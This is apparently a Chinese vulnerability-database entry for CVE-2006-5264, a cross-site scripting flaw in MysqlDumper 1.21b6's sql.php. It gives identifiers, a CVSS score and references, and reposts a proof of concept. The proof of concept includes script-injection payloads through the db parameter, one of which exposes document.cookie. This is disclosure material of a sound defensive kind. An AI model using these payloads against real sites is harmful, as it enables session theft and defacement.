MysqlDumper 'sql.php'跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193216 漏洞类型 跨站脚本
发布时间 2006-10-12 更新时间 2006-10-12
CVE编号 CVE-2006-5264 CNNVD-ID CNNVD-200610-198
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/83639
https://cxsecurity.com/issue/WLB-2006100073
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-198
|漏洞详情
MysqlDumper1.21b6中的sql.php存在跨站脚本漏洞。远程攻击者可以借助于db参数注入任意web脚本或HTML。
|漏洞EXP
#########################################################
MysqlDumper Version 1.21 b6 Xss  Vulnerability
 
#########################################################

By Crackers_Child

crackers_child (at) sibersavascilar (dot) com [email concealed]

www.sibersavacilar.com

#########################################################

Download Script

http://www.mysqldumper.de/board/downloads.php?view=detail&id=17

#########################################################
Exploit
#########################################################

www.site.com/mysqldumper_path/sql.php?db=[Xss codes]

#########################################################

Examples

/mysqldumper_path/sql.php?db=<script>alert(document.cookie)</script>

/mysqldumper_path/sql.php?db=<script>alert(/HACKED BY CRACKERS_CH&#304;LD)</script>

#########################################################

Greetz:All My Friends !

#########################################################
|受影响的产品
MySQLDumper MySQLDumper 1.21b V6
|参考资料

来源:BUGTRAQ
名称:20061011MysqlDumperVersion1.21b6XssVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448269/100/0/threaded
来源:SREASON
名称:1712
链接:http://securityreason.com/securityalert/1712
来源:SECUNIA
名称:22392
链接:http://secunia.com/advisories/22392